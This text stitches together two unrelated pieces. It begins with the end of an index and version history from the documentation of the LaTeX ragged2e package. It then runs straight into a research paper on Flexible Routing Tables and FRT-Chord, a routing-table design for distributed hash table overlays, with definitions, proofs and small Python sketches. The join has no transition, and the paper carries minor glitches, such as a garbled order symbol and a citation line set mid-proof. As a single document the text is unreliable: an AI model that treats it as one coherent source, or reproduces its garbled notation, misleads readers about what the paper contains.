\RaggedLeftLeftskip ............. 4, 99, 115, 128, 189
\RaggedLeftParfillskip ............. 4, 99, 121, 134, 192
\RaggedLeftParindent ....... 4, 99, 124, 137, 193
\RaggedLeftRightskip ............. 4, 99, 118, 131, 190
\RaggedRight ............. 3, 60, 74, 167, 229, 252
\raggedright ............. 3, 13, 249, 252
\RaggedRightLeftskip ............. 4, 99, 116, 129, 202
\RaggedRightParfillskip ............. 4, 99, 122, 135, 205
\RaggedRightParindent ....... 4, 99, 125, 138, 206
\RaggedRightRightskip ............. 4, 99, 119, 132, 203
\relax ............. 16, 19, 65, 76, 82, 93, 145, 223, 229, 235, 241
\renewcommand ........... 50
\RequirePackage .......... 95, 97
\reserved@e ............ 165, 167
\reserved@f ............ 165, 167
\rightskip ............ 6, 14, 19, 44, 178, 191, 204, 215
S
\sloppy ............ 49, 64
\spaceskip ............ 15, 146, 148, 151
\string ............. 73
T
\thr@@ ............. 145
\trivlist ............. 222, 228, 234, 240
\tt ............. 18
\ttraggedright ............. 17
\tw@ ............. 127, 128, 130, 132, 148
U
\unskip ............. 163
X
\xspaceskip ............. 16
Z
\z@ ............. 7, 9, 14, 40, 43, 59, 123, 124, 125, 127, 128, 130, 132, 136, 137, 138, 145, 146, 151, 167, 213, 214
\z@skip ............. 8, 40, 44, 56, 116, 118, 120, 121, 129, 131, 133, 134
Change History
v1.00
General: New from \raggedright V 1.21 ................................. 1
v1.01
General: Documentation improved ................................. 1
v1.02
General: Moved to LPPL ............................................ 1
v2.00
\@raggedtwoe@abdhook: New macro ................................. 9
\@raggedtwoe@document@opt: New macro ............................. 9
\@raggedtwoe@everyselectfont: Completely redesigned and removed
\RaggedSpaceskip and \RaggedXSpaceskip ......................... 11
\@raggedtwoe@gnewline: New macro ................................. 12
\@raggedtwoe@raggedrightboxes@opt: New macro .................... 7
\@raggedtwoe@saved@gnewline: New macro ............................ 12
\Centering: Call \@raggedtwoe@everyselectfont and switch
\@gnewline ......................................................... 13
\JustifyingParfillskip: New macro ................................. 10
\JustifyingParindent: New macro ................................. 10
\RaggedLeft: Call \@raggedtwoe@everyselectfont and switch
\@gnewline ......................................................... 13
\RaggedRight: Call \@raggedtwoe@everyselectfont and switch
\@gnewline ......................................................... 13
\if@raggedtwoe@footmisc: New macro ................................. 7
\justifying: New macro ............................................. 13
General: Allow all-lowercase versions of options .................. 7
Allow all-lowercase versions of options and removed documentation of
mixed-case versions. ............................................. 5
Incorporated \raggedr ................................................. 1
Load the \footmisc package ........................................... 9
New command \justifying ............................................. 3
New environment justify ............................................. 5
New option document ................................................. 6, 8
New option footnotes ................................................. 6, 8
New option raggedrightboxes ......................................... 6, 7
Pass all other options to \footmisc if it’s loaded ................. 9
Removed \RaggedSpaceskip and \RaggedXSpaceskip .................. 3, 10
Removed spaces and unneeded braces from \setlength; replaced plus
with \@plus ..................................................... 6
justify: New environment ............................................. 14
v2.01
\@raggedtwoe@everyselectfont: Removed the setting of \xspaceskip .......................... 11
v2.02
\@raggedtwoe@gnewline: Bugfix: \@nolerr → \@nolnerr ................................. 12
General: Bugfix: \if@raggedtwoe@footmisc@true →
\@raggedtwoe@footmisc@true ..................................... 8
Removed \setlength .................................................. 8
Use \@flushglue ..................................................... 6
FlushRight: Use \trivlist \ldots \endtrivlist instead of
\begin{trivlist} \ldots \end{trivlist} ............................. 14
justify: Use \trivlist \ldots \endtrivlist instead of \begin{trivlist}
\ldots \end{trivlist} ............................................. 14
v2.03
General: Bugfix: footnotes was actually raggedrightboxes .................... 8
v2.04
\@raggedtwoe@abdhook: Set \@tocrmarg and use \PackageInfo .................... 9
\@raggedtwoe@everyselectfont: Reset \spaceskip when we are not active ...................... 12
\@raggedtwoe@raggedrightboxes@opt: The setting of \parindent is superfluous ..................... 8
General: Initialize \JustifyingParindent with \parindent ..................... 10
Insert missing \ ................................................................. 10
Save more commands ......................................................... 14
v2.1
\@raggedtwoe@abdhook: bugfix: Use \@tocrmarg only if it's defined ........... 9
\@raggedtwoe@gnewline: Bugfix: handle math .................................... 12
General: bugfix: \Flushleft instead of \FlushLeft (found by Berend Hasselman) .................................................. 14
bugfix: Load footmisc directly and not via \AtEndOfPackage (bug found by Axel Sommerfeldt) ................................................................. 10
document that document needs footmisc ...................................... 6
v2.2
\@raggedtwoe@raggedrightboxes@opt: Definition of \@arrayparboxrestore has changed ......................... 7
General: Change maintenance status of package ............................ 2
Move to git/gitlab, use svninfo2 ........................................... 1
Require a new version of \LaTeX(2017/03/29) .................................. 1
v3.0
General: Change maintenance status ............................................ 2
document that everysel is obsolete .................................................. 6
v3.00
\@raggedtwoe@everyselectfont: Use kernel hook if available .................. 12
General: Remove the everysel package if kernel hooks are available .......... 9
v3.1
\Centering: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
\RaggedLeft: Robustify the user macros ...................................... 13
\RaggedRight: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
\justifying: Robustify the user macros (Thanks to Markus Kohm for the hint) ................................................................. 13
General: Use the updated definition of \raggedright .......................... 2
Flexible Routing Tables:
Designing Routing Algorithms for Overlays
Based on a Total Order on a Routing Table Set
Hiroya Nagao, Kazuyuki Shudo
Tokyo Institute of Technology, Tokyo, Japan
Email: {hiroya.nagao, shudo}@is.titech.ac.jp
Abstract—This paper presents Flexible Routing Tables (FRT), a method for designing routing algorithms for overlay networks. FRT facilitates extending routing algorithms to reflect factors other than node identifiers.
An FRT-based algorithm defines a total order on the set of all patterns of a routing table, and performs identifier-based routing according to that order. The algorithm gradually refines its routing table along the order by three operations: guarantee of reachability, entry learning, and entry filtering.
This paper presents FRT-Chord, an FRT-based distributed hash table, and gives proof that it achieves $O(\log N)$-hop lookups. Experiments with its implementation show that the routing table refining process proceeds as designed.
Grouped FRT (GFRT), which introduces node groups into FRT, is also presented to demonstrate FRT’s flexibility. GFRT-Chord resulted in a smaller number of routing hops between node groups than both Chord and FRT-Chord.
I. INTRODUCTION
Numerous distributed hash tables (DHTs) have been proposed and actively researched over the last decade [1]–[7]. DHT routing algorithms provide scalability, fault tolerance, and reliability to overlay networks. Here, we focus on two features lacking in the routing algorithms of existing DHTs.
The first feature is dynamic routing table size. Existing DHTs limit routing table size, in other words the maximum number of routing table entries, to tens or hundreds. DHTs set the limitation because DHTs assume an unreliable, large-scale network such as the Internet, and it is difficult for nodes to maintain all of the millions of other nodes on such a network. Routing algorithms that achieve shorter path lengths with a small routing table have therefore been considered to be better algorithms. It is not always true, however, that the routing table size must be kept small. In OneHop [8] and EpiChord [9], for instance, routing table sizes are large and each routing table maintains a list of all nodes in the network. Moreover, it is difficult to estimate a suitable routing table size because the optimal size depends on node lifespan, node availability, and the number of nodes, all of which may change dynamically while the overlay network evolves and operates. It is therefore necessary to design a routing algorithm that can adapt to any routing table size and change dynamically.
The second feature is a node identifier consideration that does not restrict routing table candidates. Each node has a node identifier, an address in an overlay network, and messages are forwarded according to those identifiers. Routing tables are therefore constructed using node identifiers. Existing routing algorithms reflect node identifiers by restricting routing table candidates to a subset of routing tables with some desirable property, such as $O(\log N)$-hop lookup performance in an $N$-node network. For instance, Chord [1] restricts node identifiers in a routing table at a node $s$ to those nodes that most closely follow $s + 2^i$. Kademlia [5] restricts the number of nodes whose identifiers are $[2^i, 2^{i+1})$ away from $s$, based on the XOR metric, to at most a constant $k$. Such restrictions are comprehensible and make data structures and construction processes simple, and are suitable to reflect only node identifiers. Such restrictions cause problems, however, not only in that routing tables do not know all nodes, despite the small number of nodes present, but also in that they eliminate opportunities to consider factors other than node identifiers, making extension of the routing algorithm problematic.
Algorithm extension is a promising approach to overcoming inherent problems in overlays, such as a number of relay nodes and insufficient consideration of network proximity. For instance, LPRS-Chord [10] and Coral [11] reflect network latency in routing tables, and Diminished Chord [12] and GTap [13] reflect node groups. Extendibility is a key property of DHTs and determines what extensions can be implemented. As mentioned above, however, the existing method of considering node identifiers interferes with constructing routing tables that are desirable in terms of such factors. The restriction on routing table candidates poses difficulty in considering factors other than node identifiers. It is difficult to achieve a balance between node identifier considerations and other factor considerations. A scheme of reflecting node identifiers without such restrictions is important for future applications.
As a solution we propose flexible routing tables (FRT), a method for designing routing algorithms for overlay networks. An FRT-based algorithm defines a total order $\leq_{\mathrm{ID}}$ as an indicator of the relative merits between node identifier combinations in a routing table, and continuously refines a routing table in accordance with the order. By doing so, the algorithm is able to dynamically change the routing table size and reflect node
identifiers in a routing table without restriction on routing table candidates.
FRT has the following features.
Broadening of target domain: A node can route a message in $O(1)$-hop if the node can hold all nodes in an overlay. Otherwise, the algorithm routes messages as multi-hop lookups. The algorithm is also able to continuously change between those lookup styles without knowledge of the number of nodes.
Improved extendability: FRT supports simultaneous consideration of node identifiers and other factors because routing table construction does not restrict candidates for node identifier combinations in a routing table.
Effective utilization of entry information: In existing DHTs, routing tables tend to obtain only entry information needed for an eventual routing table, where entry information is knowledge needed to construct entries. Entry information that is not required therefore gets ignored. An FRT-based algorithm does not ignore any entry information, and thus is able to construct better routing tables by evaluating all entry information.
Flexibility: An FRT-based algorithm is able to construct situation-dependent routing tables, based on, for example, the number of nodes in the system, node lifespan, node availability, and performance requirements, without restriction on routing table size, since the routing table can be resized dynamically.
Facilitation of node identifier considerations: An FRT-based algorithm expresses the relative merits of node identifier combinations in a routing table by a total order $\leq_{ID}$, and thus the algorithm can consider node identifiers by referring only to an order on the routing table set. As a result, the algorithm is able to easily choose a routing table with more desirable node identifier combinations from among routing table candidates fulfilling complex restrictions on factors other than node identifiers.
Continual extension: FRT is able to continuously extend and improve existing routing algorithms for overlay networks by inserting additional entries into routing tables in the algorithms according to their order, which is defined in advance. FRT-based routing table construction protocols can be designed as extensions of existing algorithms while retaining all entries in the original routing table, and thus, at the least, we can retain the routing efficiency and other features of the original algorithm.
We describe a concrete FRT algorithm by taking FRT-Chord, a DHT we designed based on FRT, as an example. We also implement the proposed algorithm, and perform experiments.
In Section IV, we discuss how to design DHTs for future extension, and the extendibility of DHTs based on FRT.
II. RELATED WORK
A. Chord
Chord is a distributed hash table (DHT), where node identifiers are represented as a circle of natural numbers from 0 to $2^m - 1$ in a clockwise direction ($m$ is a bit length). The identifier space is called a Chord ring. The node responsible for a key is that node whose identifier most closely follows the key, called a successor.
In Chord, each node maintains three routing tables (successor list, predecessor, and finger table). Each entry in the routing tables is a node identifier and IP address pair. A node is able to send messages to another node with a specified node identifier, because the routing tables convert a node identifier to its corresponding IP address.
A successor list at node $s$ contains a certain number of closest nodes from $s$ in the clockwise direction, and a predecessor contains the closest node from $s$ in the anticlockwise direction. These two routing tables are maintained by periodically running a stabilization routine, wherein the node sends messages to the successor for guaranteeing lookup correctness. The $i$th entry in a finger table is the first node that succeeds $s$ by at least $2^{i-1}$ in the clockwise direction. Using the finger table significantly reduces the remaining distance.
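The finger-table targets just described can be sketched in Python (a hypothetical helper; a 6-bit identifier space is assumed only for concreteness):

```python
M = 6             # identifier bit length, so the ring has 2**6 = 64 positions
RING = 1 << M     # 2**m

def finger_targets(s: int) -> list[int]:
    """Points s + 2**(i-1) (mod 2**m) for i = 1..m.

    The i-th finger-table entry at node s is the first node whose
    identifier succeeds the i-th of these targets clockwise.
    """
    return [(s + (1 << (i - 1))) % RING for i in range(1, M + 1)]
```

For a node near the end of the ring the targets wrap around, e.g. the third target of node 60 is (60 + 4) mod 64 = 0.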
In Chord, the identifier distance from $x$ to $y$, $d(x, y)$, is defined as follows (Fig.1).
$$d(x, y) = \begin{cases}
y - x, & \text{for } x < y \\
2^m, & \text{for } x = y \\
y - x + 2^m, & \text{for } x > y
\end{cases}$$
A query for a key identifier $t$ is forwarded to a node $s'$ in the routing table for which $d(s', t)$ is minimized among any other entries. Routing schemes like this one that repeat forwarding through nearest nodes to a target are called greedy routing schemes. Chord achieves $O(\log N)$-hop lookup performance with $N$ nodes.
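The distance definition and the greedy forwarding rule can be sketched together in Python (hypothetical helpers; a 6-bit ring, keeping the convention $d(x, x) = 2^m$ from the definition above):

```python
M = 6
RING = 1 << M     # 2**m positions on the Chord ring

def d(x: int, y: int) -> int:
    """Clockwise identifier distance from x to y, as defined above."""
    if x == y:
        return RING           # a full turn, per the definition
    return (y - x) % RING     # y - x, or y - x + 2**m when x > y

def forward(entries: list[int], t: int) -> int:
    """Greedy routing: forward toward the entry that minimizes the
    remaining clockwise distance d(e, t) to the target identifier t."""
    return min(entries, key=lambda e: d(e, t))
```

For example, with entries {8, 20, 40} and target 25, node 20 is chosen, since its remaining distance 5 is the smallest.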
B. EpiChord
EpiChord is a DHT in which the number of entries in the routing table is not limited. EpiChord divides the Chord ring into two symmetric sets of exponentially smaller slices, where the number of entries is greater than some constant at all times. This constraint provides an $O(\log N)$-hop guarantee on lookup path length. Such a constraint, however, also restricts candidates for node identifier combinations in routing tables. FRT, on the other hand, is able to construct routing tables from among all nodes, and reflects node identifiers without such constraints.
C. Symphony
Symphony [7] is also a DHT using a Chord ring. In Symphony, each node maintains two different entries, short distance links (SDLs) and long distance links (LDLs). SDLs are fixed entries maintained for reachability, namely a successor and a predecessor. Each LDL is determined probabilistically according to an identifier generated by a specific probability distribution based on the Small World phenomenon [14]. It therefore might seem that any node may be selected as an LDL, and that Symphony does not restrict candidates for node identifier combinations. However, each LDL is selected deterministically according to a probabilistically generated identifier, and thus, there is no opportunity to reflect factors other than node identifiers. FRT differs from Symphony in terms of flexibility of entry selections.
III. FRT-CHORD
In this section we describe FRT-Chord, an FRT-based DHT. In FRT-Chord the identifier space is a Chord ring and the node responsible for a key is determined as in Chord. FRT-Chord also performs a greedy routing as in Chord, but the method of routing table construction has some unique features.
In FRT-Chord, each node maintains a single routing table $E$, without distinguishing between a successor list, a predecessor, and a finger table, because such a distinction restricts routing tables. The routing table $E$ is a set of entries $\{e_i\}_{i=1}^{|E|}$ (see Fig.2). Each entry $e_i$ consists of a node identifier $e_i.id$ and an IP address and port pair $e_i.addr$ (hereafter we refer to $e_i.id$ simply as $e_i$). A routing table $\{e_i\}$ at a node $s$ is aligned clockwise from $s$, so it satisfies $i < j \Rightarrow d(s, e_i) < d(s, e_j)$. By this definition, $e_1$ and $e_{|E|}$ correspond to a successor and a predecessor, respectively. We assume that the correctness of these entries is guaranteed by the stabilization routine and regard them as sticky entries (Section III-D).
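As a concrete illustration of the identifier space, table ordering, and greedy forwarding described above, the following sketch (our own, with a hypothetically small $m = 16$ ring; none of these names come from the paper) keeps a routing table aligned clockwise from $s$:

```python
# Hypothetical small Chord-style ring with m = 16 identifier bits.
M = 16
RING = 1 << M

def d(s: int, t: int) -> int:
    """Clockwise (ring) distance from s to t."""
    return (t - s) % RING

def sort_table(s: int, entries: list[int]) -> list[int]:
    """Align entries clockwise from s, so i < j implies d(s, e_i) < d(s, e_j)."""
    return sorted(entries, key=lambda e: d(s, e))

def forward(s: int, table: list[int], t: int) -> int:
    """Greedy routing: forward to the entry minimizing d(e, t)."""
    return min(table, key=lambda e: d(e, t))

s = 0
table = sort_table(s, [40000, 300, 9000, 65000])
# table[0] plays the role of the successor e_1, table[-1] of the predecessor e_|E|.
```

With this table, a query at $s = 0$ for key 10000 is forwarded to entry 9000, the table node whose clockwise distance to the target is smallest.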
A. $\leq_{ID}$: A Total Order on the Routing Table Set
An FRT-based algorithm defines a total order $\leq_{ID}$ on node identifier combinations in a routing table. The order represents the relative merits of routing tables in terms of node identifiers, and the algorithm iteratively refines the routing table according to it. In this section, we illustrate the design of the order $\leq_{ID}$ in FRT-Chord; for simplicity we set the length of the equivalent of the successor list to 1.
1) Definition of the Best Routing Table: Let $E.forward(t)$ be the entry in a routing table $E$ to which a query is forwarded at a node $s$ toward a target identifier $t$. The reduction ratio of a forwarding of the query is defined as $d(E.forward(t), t)/d(s, t)$; the smaller the reduction ratio, the more efficient the forwarding. Here we focus on the worst-case reduction ratio $r_i(E)$ of a forwarding to a node $e_i$ other than the predecessor. The reduction ratio of a forwarding to $e_i$ takes its worst-case value when the key identifier $t$ equals $e_{i+1}$ (see Fig.3), so
$$r_i(E) = \frac{d(e_i, e_{i+1})}{d(s, e_{i+1})}, \quad (i = 1, \ldots , |E| - 1). \quad (4)$$
We define the best routing table $\tilde{E} = \{\tilde{e}_i\}$ as follows.
Definition 1: In FRT-Chord, the best routing table $\tilde{E} = \{\tilde{e}_i\}$ is the one that minimizes $\max_i \{r_i(E)\}$ over all routing table candidates $E$.
Lemma 1:
$$r_i(\tilde{E}) = 1 - \left( \frac{d(s, \tilde{e}_1)}{d(s, \tilde{e}_{|E|})} \right)^{\frac{1}{|E| - 1}}. \quad (5)$$
Proof: By (6), $\max_i \{r_i(E)\}$ takes its minimum value when all of the $r_i(E)$ are equal.
$$\prod_{i=1}^{|E| - 1} (1 - r_i(E)) = \frac{d(s, e_1)}{d(s, e_{|E|})} \ (\text{const.}) \quad (6)$$
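Lemma 1 can be checked numerically. The sketch below (our own; the distances are hypothetical) builds the geometrically spaced distance profile of the best routing table and confirms that every $r_i$ equals the right-hand side of (5):

```python
# Numerical check of Lemma 1 with hypothetical distances.
n = 9                       # |E|, hypothetical table size
d1, dlast = 2.0, 2048.0     # d(s, e_1) and d(s, e_|E|), hypothetical
g = (dlast / d1) ** (1.0 / (n - 1))         # common ratio of the best table
dist = [d1 * g ** i for i in range(n)]      # d(s, e_i), geometrically spaced
# r_i = d(e_i, e_{i+1}) / d(s, e_{i+1}) = 1 - d(s, e_i) / d(s, e_{i+1})
r = [1 - dist[i] / dist[i + 1] for i in range(n - 1)]
rhs = 1 - (d1 / dlast) ** (1.0 / (n - 1))   # right-hand side of (5)
assert all(abs(ri - rhs) < 1e-12 for ri in r)
```

Because the distances form a geometric progression, every ratio $d(s, e_i)/d(s, e_{i+1})$ is the same, which is exactly the condition in the proof above that all $r_i(E)$ be equal.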
Theorem 1: Assuming that all nodes have the best routing table with $O(\log N)$ entries in an $N$-node network, path lengths are $O(\log N)$ with high probability.
Proof: Let $\tilde{E} = \{\tilde{e}_i\}$ be the best routing table at a node $s$. With high probability, the distance between two generic consecutive nodes is at least $2^m/N^2$ [15], namely
$$d(s, \tilde{e}_1) > \frac{2^m}{N^2}.$$ \hspace{1cm} (7)
The distance between any nodes is at most $2^m$, namely
$$d(s, \tilde{e}_{|E|}) < 2^m. \quad (8)$$
Thus, according to Lemma 1, for any $i = 1, \ldots , |E| - 1$,
$$r_i(\tilde{E}) < 1 - \left( \frac{1}{N} \right)^{\frac{2}{|E| - 1}}. \quad (9)$$
For $|E| = 1 + 2 \log N$, the path length needed to reduce the remaining distance to $2^m/N$ or less is at most
$$\log_{r_i(\tilde{E})} \frac{1}{N} < \log N.$$ \hspace{1cm} (10)
The path length is therefore $O(\log N)$. When the remaining distance is at most $2^m/N$, the number of node identifiers landing in a range of this size is, with high probability, $O(\log N)$.
Proc. 11th IEEE Int'l Conf. on Peer-to-Peer Computing (IEEE P2P’11), pp.72-81, August 2011
Thus the query reaches the key $t$ within another $O(\log N)$ steps, meaning that the entire path length is $O(\log N)$.
2) Definition of $\leq_{ID}$ based on $r_i(E)$: In FRT-Chord, the order $\leq_{ID}$ represents an indicator of closeness to the best routing table, and is defined as follows.
Definition 2: Let $\{r_{(i)}(E)\}$ be the list arranged in descending order of $\{r_i(E)\}$. Then
$$E \leq_{ID} F \iff \{r_{(i)}(E)\} \leq_{dic} \{r_{(i)}(F)\}. \quad (11)$$
In this definition, $\leq_{dic}$ is a lexicographic order, namely
$$\{a_i\} <_{dic} \{b_i\} \iff a_k < b_k \ \text{for} \ k = \min \{i \mid a_i \neq b_i\}, \quad (12)$$
$$\{a_i\} \leq_{dic} \{b_i\} \iff \{a_i\} <_{dic} \{b_i\} \ \lor \ \{a_i\} = \{b_i\}. \quad (13)$$
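A minimal sketch of the comparator implied by Definition 2 and (12)-(13) (our own naming; the paper defines only the mathematical order):

```python
# Sketch of <=_dic and <=_ID; function names are our own.
def leq_dic(a: list[float], b: list[float]) -> bool:
    """Lexicographic a <=_dic b: the first differing element decides."""
    for x, y in zip(a, b):
        if x != y:
            return x < y
    return len(a) <= len(b)

def leq_id(r_E: list[float], r_F: list[float]) -> bool:
    """E <=_ID F, comparing descending-sorted worst-case reduction ratios."""
    return leq_dic(sorted(r_E, reverse=True), sorted(r_F, reverse=True))

# A table whose largest reduction ratio is smaller is better
# (closer to the best routing table).
assert leq_id([0.5, 0.5, 0.5], [0.9, 0.1, 0.1])
```

Smaller under $\leq_{ID}$ means better: the table's worst forwarding step shrinks the remaining distance by a larger factor.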
When we define $\leq_{ID}$ as above, Theorem 2 holds.
Theorem 2: Let $E$ be a candidate for a routing table and $\tilde{E}$ be a best routing table. Then $\tilde{E} \leq_{ID} E$.
Proof: From Lemma 1 and Definition 2, $\tilde{E}$ is the minimum routing table candidate according to $\leq_{ID}$.
We design the algorithm framework that uses the order $\leq_{ID}$ in three parts: guarantee of reachability, entry learning, and entry filtering. FRT-based algorithms consist of these three parts.
B. Guarantee of Reachability
In FRT, the set of operations that ensures queries reach the node responsible for a key is called the guarantee of reachability.
FRT-Chord's guarantee of reachability is a stabilization routine, as in Chord.
C. Entry Learning
We define entry information as information needed to compose an entry including a node identifier, an IP address, and a port number. In FRT, learning entry information and inserting the entry into a routing table are called entry learning. FRT does not limit how and when learning occurs so that opportunities to refine a routing table will not be wasted.
The following are examples of how FRT learns entries.
1) When a node first joins an overlay, it learns entries via a transfer of the routing table from the node closest to itself. This is called transferring at join.
2) When a node communicates with another node during routing, it learns the nodes it contacts.
3) Nodes actively look up and learn entries with which they communicate, as in 2). These lookups are called active learning lookups.
In FRT-Chord, active learning lookups are similar to Symphony [7]. A node looks up a key generated from a probability distribution based on identifiers in the best routing table. The probability distribution at a node $s$ is in inverse proportion to the distance from $s$. Letting $d_s(x) = d(s, x)$, the cumulative distribution function $F(x)$ is defined as
$$F(x) = \begin{cases} \dfrac{\ln(d_s(x)/d_s(e_1))}{\ln(d_s(e_{|E|})/d_s(e_1))}, & \text{for } d_s(e_1) < d_s(x) < d_s(e_{|E|}) \quad (15) \\ 0, & \text{otherwise.} \quad (16) \end{cases}$$
When the probability distribution is defined as above, letting $\text{rnd}$ produce a random number between 0 and 1, the key is generated from the expression:
$$s + d_s(e_1)(d_s(e_{|E|})/d_s(e_1))^{\text{rnd}}. \quad (17)$$
FRT-Chord uses transfers at join. If the need arises, active learning lookups are performed.
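Key generation for active learning lookups, per (17), can be sketched as follows (our own code; `rnd` is a uniform random number in $[0, 1]$, and the small ring size is an assumption):

```python
# Sketch of key generation per (17); ring size is a hypothetical assumption.
M = 16
RING = 1 << M

def gen_lookup_key(s: int, d_succ: int, d_pred: int, rnd: float) -> int:
    """Key at distance d_s(e_1) * (d_s(e_|E|)/d_s(e_1))**rnd from s."""
    dist = d_succ * (d_pred / d_succ) ** rnd
    return (s + int(dist)) % RING

# rnd = 0 yields a key at the successor's distance, rnd = 1 one at the
# predecessor's distance; intermediate values are log-uniform in distance.
```

The exponentiation makes the lookup keys log-uniform in distance from $s$, matching the inverse-distance density of the best routing table's entries.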
In FRT, new entries learned by the above methods are inserted into the routing table. Through repeated entry learning, a node becomes able to forward a query to a node closer to a given key. As a separate issue, because the number of entries $|E|$ would otherwise increase continuously, a node must prune entries at some point.
FRT-Chord sets a routing table size $L$, the maximum number of entries, to prevent the number of entries from increasing without limit. $L$ is configured dynamically and flexibly, based on the number of entries that should be retained according to node lifetime, machine performance, network latency, and so on.
For instance, if the routing table size $L$ is larger than $N$ and the network is stable, routing tables are able to contain all nodes in the system, and the algorithm achieves $O(1)$-hop lookup performance.
D. Entry Filtering
If $L < N$, when $|E|$ exceeds $L$, FRT-Chord removes either the newly learned entry or an entry in the current routing table in order to keep $|E| \leq L$.
In FRT, such entry removal operations are called entry filtering. Through continuous entry learning and entry filtering, FRT-based algorithms refine routing tables incrementally according to the order $\leq_{ID}$.
An FRT-based algorithm defines some entries as sticky entries, which FRT excludes as removal candidates during entry filtering. For example, short distance links (SDLs) are one type of sticky entry. By designating sticky entries, we can still easily design a total order $\leq_{ID}$. Entry filtering in FRT is summarized as follows.
1) Substitute entries in $E$ into $C$.
2) Remove sticky entries from $C$.
3) Select an entry from $C$ to refine $E$ according to $\leq_{1d}$.
In this way, FRT can consider node identifiers, without restrictions on candidate node identifier combinations in a routing table, through the order $\leq_{ID}$. We can also extend the algorithm effectively by introducing factors other than node identifiers into entry filtering.
In the rest of this section, we describe FRT-Chord entry filtering in detail.
Let $e_{i^*}$ be the entry removed from a routing table $E$ by FRT-Chord's entry filtering, and let $S^E_i$ be a canonical spacing defined as follows (see Fig.4).
Definition 3:
$$S_i^E = \log \frac{d(s, e_{i+1})}{d(s, e_i)}, \quad (i = 1, \ldots, |E|-1) \quad (18)$$
When $S^E_i$ is defined as above, the entry $e_{i^*}$ is selected from entries other than $e_1$ and $e_{|E|}$, because those entries are sticky, and (19) holds (see Fig.5).
$$S^E_{i^*-1} + S^E_{i^*} \leq S^E_{i-1} + S^E_i, \quad (i = 2, \ldots, |E| - 1) \quad (19)$$
In this way FRT-Chord can find $i^*$ at low cost by maintaining a list sorted in ascending order of $S^E_{i-1} + S^E_i$, because only a constant number of list elements change with each entry learning and entry filtering.
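The spacing-based selection of $i^*$ can be sketched as follows (our own illustration; the ring size and entry values are hypothetical):

```python
# Sketch of canonical spacings (18) and the choice of i* per (19).
import math

M = 16
RING = 1 << M

def d(s, t):
    return (t - s) % RING

def spacings(s, table):
    """S_i = log2(d(s, e_{i+1}) / d(s, e_i)), i = 1..|E|-1."""
    return [math.log2(d(s, table[i + 1]) / d(s, table[i]))
            for i in range(len(table) - 1)]

def filter_index(s, table):
    """0-based index i* minimizing S_{i-1} + S_i over non-sticky entries."""
    S = spacings(s, table)
    candidates = range(1, len(table) - 1)   # exclude successor and predecessor
    return min(candidates, key=lambda i: S[i - 1] + S[i])

s = 0
table = [2, 4, 5, 64, 1024, 60000]          # sorted by d(s, .); hypothetical
i_star = filter_index(s, table)             # the most "crowded" interior entry
```

Here the entries at distances 4 and 5 crowd each other on the log scale, so the entry at distance 4 is the one whose removal merges the two smallest adjacent spacings.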
Letting $\{S^E_{(i)}\}$ be the list arranged in descending order of $\{S^E_i\}$, the following lemma holds.
**Lemma 2:**
$$E \leq_{ID} F \iff \{S^E_{(i)}\} \leq_{dic} \{S^F_{(i)}\} \quad (20)$$
**Proof:** From the definitions of $r_i(E)$ and $S^E_i$, we have
$$r_i(E) = 1 - 2^{-S^E_i}. \quad (21)$$
Since this expression is increasing in $S^E_i$, small and large elements of the lists $\{r_i(E)\}$ and $\{S^E_i\}$ correspond with each other.
**Theorem 3:** In FRT-Chord, let $E \setminus \{e_i\}$ be the routing table filtered by removing $e_i$. For any $e_i$ $(i = 2, \ldots, |E| - 1)$,
$$E \setminus \{e_{i^*}\} \leq_{ID} E \setminus \{e_i\}. \quad (22)$$
**Proof:** By calculating the lists $\{S^{E \setminus \{e_{i^*}\}}_{(i)}\}$ and $\{S^{E \setminus \{e_i\}}_{(i)}\}$, arranged in descending order of the canonical spacings after entry filtering (note that $S^E_{i^*-1} + S^E_{i^*} \leq S^E_{i-1} + S^E_i$), the relation $\{S^{E \setminus \{e_{i^*}\}}_{(i)}\} \leq_{dic} \{S^{E \setminus \{e_i\}}_{(i)}\}$ is derived, and $E \setminus \{e_{i^*}\} \leq_{ID} E \setminus \{e_i\}$ holds by Lemma 2.
**Theorem 4:** In FRT-Chord, let $(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\}$ be a routing table after an entry learning process and a succeeding entry filtering process, where $e_{\text{learn}} \not\in E$ is the learned entry and $e_{\text{filter}} \in (E \cup \{e_{\text{learn}}\})$ is the entry removed in these processes. Then
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\} \leq_{ID} E \quad (23)$$
**Proof:** Since $(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\} = E$,
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\} \leq_{ID} E \quad (24)$$
According to Theorem 3,
$$(E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{filter}}\} \leq_{ID} (E \cup \{e_{\text{learn}}\}) \setminus \{e_{\text{learn}}\}. \quad (25)$$
Therefore, since $\leq_{ID}$ is a total order, (23) holds.
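Theorem 4's refinement can be exercised in a small simulation (entirely our own construction, with a hypothetical ring and table size). Rather than the full lexicographic statement, it checks a provable consequence: when the successor and predecessor are kept sticky and learned entries fall strictly between them, the maximum canonical spacing, which determines the worst-case reduction ratio via $r_i = 1 - 2^{-S^E_i}$, never increases across a learn-then-filter step:

```python
# Simulation of repeated entry learning and entry filtering (our own).
import math
import random

M, L = 16, 8                  # identifier bits and table size: assumptions
RING = 1 << M

def d(s, t):
    return (t - s) % RING

def spacings(s, tbl):
    """Canonical spacings S_i = log2(d(s, e_{i+1}) / d(s, e_i))."""
    return [math.log2(d(s, tbl[i + 1]) / d(s, tbl[i]))
            for i in range(len(tbl) - 1)]

def learn_and_filter(s, tbl, e):
    """One learn-then-filter step; successor and predecessor stay sticky,
    so only entries strictly between them are learned here."""
    if e == s or e in tbl or d(s, e) <= d(s, tbl[0]) or d(s, e) >= d(s, tbl[-1]):
        return tbl
    tbl = sorted(tbl + [e], key=lambda x: d(s, x))
    if len(tbl) <= L:
        return tbl
    S = spacings(s, tbl)
    i = min(range(1, len(tbl) - 1), key=lambda j: S[j - 1] + S[j])
    return tbl[:i] + tbl[i + 1:]          # remove e_{i*}

random.seed(7)
s = 0
tbl = sorted(random.sample(range(1, RING), L), key=lambda x: d(s, x))
for _ in range(500):
    worst = max(spacings(s, tbl))
    tbl = learn_and_filter(s, tbl, random.randrange(1, RING))
    assert max(spacings(s, tbl)) <= worst + 1e-9   # table never gets worse
```

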